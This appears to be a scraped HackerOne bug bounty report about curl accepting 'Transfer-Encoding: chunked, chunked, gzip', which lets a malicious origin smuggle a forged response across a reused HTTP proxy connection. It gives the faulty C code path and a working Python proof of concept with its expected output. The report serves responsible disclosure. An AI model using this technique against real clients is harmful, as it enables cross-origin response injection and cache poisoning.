{“lastseen”:”2026-06-13T21:29:54″,”description”:”## TL;DR\\n\\nA malicious HTTP origin can send `Transfer-Encoding: chunked, chunked, gzip` through a reusable HTTP proxy connection to bypass curl’s \\”chunked must be last\\” guard, queue a forged HTTP response after its own response, and make curl parse that queued data as the response for a later request to a different origin.\\n\\n## Summary:\\n\\ncurl accepts the malformed HTTP\/1.1 response header `Transfer-Encoding: chunked, chunked, gzip`.\\ncurl already has a guard that rejects transfer codings listed after `chunked`, because `chunked` must be the final transfer coding, but a duplicate `chunked` entry bypasses that guard.\\nIn `Curl_build_unencoding_stack()`, the duplicate-`chunked` branch returns `CURLE_OK` for the entire header instead of ignoring only the duplicate token and continuing to parse the later `gzip` token.\\nWhen curl uses an HTTP proxy, multiple target origins can share the same client-to-proxy TCP connection.\\nAn attacker who controls only the first requested origin can send this malformed response and queue a forged HTTP response behind the first chunked body; curl can then reuse the proxy connection and parse those queued attacker bytes as the response for a later request to a different origin.\\n\\nThe attacker does not need to control the proxy, the client machine, or the later target origin. They only need the victim workflow to fetch an attacker-controlled HTTP URL before another HTTP URL through the same reusable HTTP proxy connection.\\n\\n## Affected versions\\nThis appears to affect curl\/libcurl versions starting with `8.8.0`.\\nThe vulnerable behavior was introduced by commit `886899143f`; the first release containing that commit is `8.8.0`.\\n\\nI reproduced the issue on current repository `HEAD` `30c9c79cf8d2`, built from `https:\/\/github.com\/curl\/curl`, on:\\n\\n“`text\\ncurl 8.21.0-DEV (x86_64-pc-linux-gnu) libcurl\/8.21.0-DEV zlib\/1.2.11\\nRelease-Date: [unreleased]\\nProtocols: file ftp http ipfs ipns ws\\nFeatures: alt-svc AsynchDNS IPv6 Largefile libz threadsafe UnixSockets\\n“`\\n\\nPlatform:\\n\\n“`text\\nLinux yanzhen 5.15.0-139-generic #149~20.04.1-Ubuntu SMP Wed Apr 16 08:29:56 UTC 2025 x86_64 x86_64 x86_64 GNU\/Linux\\n“`\\n\\nRelevant code paths:\\n\\n“`c\\n\/* lib\/http.c *\/\\nresult = Curl_build_unencoding_stack(data, v, TRUE);\\n\\n\/* lib\/content_encoding.c *\/\\ncwt = find_unencode_writer(name, namelen, phase);\\nif(cwt \\u0026\\u0026 is_chunked \\u0026\\u0026 Curl_cwriter_get_by_type(data, cwt)) {\\n CURL_TRC_WRITE(data, \\”ignoring duplicate ‘chunked’ decoder\\”);\\n return CURLE_OK;\\n}\\n\\nif(is_transfer \\u0026\\u0026 !is_chunked \\u0026\\u0026\\n Curl_cwriter_get_by_name(data, \\”chunked\\”)) {\\n failf(data, \\”Reject response due to ‘chunked’ not being the last \\”\\n \\”Transfer-Encoding\\”);\\n return CURLE_BAD_CONTENT_ENCODING;\\n}\\n“`\\n\\nThe early `return CURLE_OK` skips the later `gzip` token in `Transfer-Encoding: chunked, chunked, gzip`, so the existing \\”chunked not last\\” rejection is never reached.\\n\\n## Steps To Reproduce:\\nRun the following self-contained PoC from a curl source checkout after building `src\/curl`. It does not call any local PoC file. It starts a local HTTP proxy simulator, makes one request to `attacker.test` followed by one request to `victim.test` in the same curl process, and checks whether bytes queued after the first response are parsed as the second origin’s response.\\n\\n“`bash\\npython3 \\u003c\\u003c’PY’\\nimport os, shutil, socket, subprocess, threading, time\\n\\ncurl_bin = os.environ.get(\\”CURL_BIN\\”)\\nif not curl_bin:\\n curl_bin = \\”.\/src\/curl\\” if os.path.exists(\\”.\/src\/curl\\”) else shutil.which(\\”curl\\”)\\nif not curl_bin:\\n raise SystemExit(\\”Set CURL_BIN or run from a curl checkout with .\/src\/curl\\”)\\n\\ndef read_headers(conn):\\n data = b\\”\\”\\n while b\\”\\\\r\\\\n\\\\r\\\\n\\” not in data:\\n chunk = conn.recv(4096)\\n if not chunk:\\n break\\n data += chunk\\n return data\\n\\ndef run_case(te_value):\\n listener = socket.socket()\\n listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\\n listener.bind((\\”127.0.0.1\\”, 0))\\n listener.listen(1)\\n port = listener.getsockname()[1]\\n seen_requests = []\\n\\n def proxy():\\n conn, _ = listener.accept()\\n conn.settimeout(5)\\n try:\\n seen_requests.append(read_headers(conn))\\n conn.sendall(\\n b\\”HTTP\/1.1 200 OK\\\\r\\\\n\\”\\n + b\\”Transfer-Encoding: \\” + te_value.encode(\\”ascii\\”) + b\\”\\\\r\\\\n\\”\\n + b\\”Connection: keep-alive\\\\r\\\\n\\\\r\\\\n\\”\\n + b\\”5\\\\r\\\\nHELLO\\\\r\\\\n0\\\\r\\\\n\\\\r\\\\n\\”\\n )\\n\\n # Attacker-controlled bytes queued after the first response.\\n time.sleep(0.2)\\n conn.sendall(\\n b\\”HTTP\/1.1 200 OK\\\\r\\\\n\\”\\n b\\”Content-Length: 9\\\\r\\\\n\\”\\n b\\”Connection: keep-alive\\\\r\\\\n\\\\r\\\\n\\”\\n b\\”SMUGGLED!\\”\\n )\\n\\n try:\\n seen_requests.append(read_headers(conn))\\n time.sleep(0.2)\\n conn.sendall(\\n b\\”HTTP\/1.1 200 OK\\\\r\\\\n\\”\\n b\\”Content-Length: 7\\\\r\\\\n\\”\\n b\\”Connection: close\\\\r\\\\n\\\\r\\\\n\\”\\n b\\”BENIGN\\\\n\\”\\n )\\n except Exception:\\n pass\\n finally:\\n conn.close()\\n listener.close()\\n\\n threading.Thread(target=proxy, daemon=True).start()\\n proc = subprocess.run(\\n [\\n curl_bin,\\n \\”-q\\”,\\n \\”–http1.1\\”,\\n \\”–proxy\\”, f\\”http:\/\/127.0.0.1:{port}\\”,\\n \\”-sS\\”,\\n \\”-v\\”,\\n \\”http:\/\/attacker.test\/one\\”,\\n \\”http:\/\/victim.test\/two\\”,\\n ],\\n stdout=subprocess.PIPE,\\n stderr=subprocess.PIPE,\\n timeout=10,\\n )\\n return proc, seen_requests\\n\\nprint(subprocess.check_output([curl_bin, \\”–version\\”], text=True).splitlines()[0])\\n\\ncontrol, _ = run_case(\\”chunked, gzip\\”)\\ncontrol_err = control.stderr.decode(\\”latin1\\”, \\”replace\\”)\\nprint(\\”control_exit:\\”, control.returncode)\\nprint(\\”control_rejected:\\”, \\”A Transfer-Encoding (gzip) was listed after chunked\\” in control_err)\\n\\nvuln, seen = run_case(\\”chunked, chunked, gzip\\”)\\nvuln_out = vuln.stdout.decode(\\”latin1\\”, \\”replace\\”)\\nvuln_err = vuln.stderr.decode(\\”latin1\\”, \\”replace\\”)\\nprint(\\”vulnerable_exit:\\”, vuln.returncode)\\nprint(\\”vulnerable_stdout:\\”, vuln_out)\\nprint(\\”second_request_reached_proxy:\\”, len(seen) \\u003e= 2)\\nprint(\\”proxy_connection_reused:\\”, \\”Reusing existing http: connection with proxy\\” in vuln_err)\\n\\nif (\\n \\”A Transfer-Encoding (gzip) was listed after chunked\\” in control_err\\n and vuln.returncode == 0\\n and vuln_out == \\”HELLOSMUGGLED!\\”\\n and len(seen) \\u003e= 2\\n and \\”Reusing existing http: connection with proxy\\” in vuln_err\\n):\\n print(\\”VULNERABLE: queued attacker bytes were parsed as the second origin response\\”)\\nelse:\\n print(\\”NOT REPRODUCED\\”)\\n print(vuln_err)\\n raise SystemExit(1)\\nPY\\n“`\\n\\nExpected output on a vulnerable build:\\n\\n“`text\\ncurl 8.21.0-DEV (x86_64-pc-linux-gnu) libcurl\/8.21.0-DEV zlib\/1.2.11\\ncontrol_exit: 56\\ncontrol_rejected: True\\nvulnerable_exit: 0\\nvulnerable_stdout: HELLOSMUGGLED!\\nsecond_request_reached_proxy: True\\nproxy_connection_reused: True\\nVULNERABLE: queued attacker bytes were parsed as the second origin response\\n“`\\n\\nThe control case proves that curl correctly rejects `Transfer-Encoding: chunked, gzip`.\\nThe vulnerable case proves that adding a duplicate `chunked` token changes the result: curl accepts `Transfer-Encoding: chunked, chunked, gzip`, consumes `HELLO` as the first response body, then parses `SMUGGLED!` as the body of the second request to `victim.test`.\\n\\n## Impact\\n\\n## Summary:\\nAn attacker who controls one ordinary HTTP origin can make curl\/libcurl parse queued attacker bytes as the response for a later request to a different origin when an HTTP\/1.1 proxy connection is reused. The attacker does not need local access, proxy control, or control of the later origin; they only need the victim workflow to fetch the attacker URL first through the same proxy. This can cause cross-origin response injection, cache poisoning, corrupted fetcher\/proxy output, or incorrect trust decisions.”,”published”:”2026-06-11T08:27:37″,”modified”:”2026-06-13T20:47:29″,”type”:”hackerone”,”title”:”curl: Duplicate chunked Transfer-Encoding lets a malicious origin smuggle a response across reused HTTP proxy connections”,”source”:””,”references”:””,”id”:”H1:3795615″,”bulletinFamily”:”bugbounty”,”cwe”:null,”cvelist”:[],”sourceData”:””,”sourceHref”:””,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/hackerone.com\/reports\/3795615″,”category_name”:”News”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-06-13T21:29:54″,”description”:”## TL;DR\\n\\nA malicious HTTP origin can send `Transfer-Encoding: chunked, chunked, gzip` through a reusable HTTP proxy connection to bypass curl’s \\”chunked must be last\\” guard,…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[6,8,12,117,13,33,7,11,5],"class_list":["post-62530","post","type-post","status-publish","format-standard","hentry","category-category_news","tag-cve","tag-cvss","tag-exploit","tag-hackerone","tag-news","tag-none","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n